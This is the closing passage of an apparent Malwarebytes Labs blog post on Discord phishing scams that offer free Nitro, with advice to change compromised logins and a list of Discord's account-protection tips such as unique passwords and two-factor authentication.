Sometimes these sites already have multiple red flags thrown up along the way:

discord phish 2
Caught!

Other times, you’re reliant on the site being taken down or your security tools stopping the scam in its tracks. Either way, if you’ve entered your details into one of these sites (or similar!), then change your login as soon as possible.

How to protect your Discord account

Discord offers some tips on how to keep your account safe:

  1. Use a strong password, and one that is unique to your Discord account. A password manager can help generate and store strong passwords for you, because it’s very very difficult to remember them yourself
  2. Set up two-factor authentication (2FA) on your account
  3. Set up message scanning, which automatically scans and deletes any explicit content. You can choose to do this for all messages or just those from people not on your Friends List
  4. Block users if you need to. Discord offers more information on how to do that in tip 4.

Stay safe out there!

The post Discord scammers lure victims with promise of free Nitro subscriptions appeared first on Malwarebytes Labs.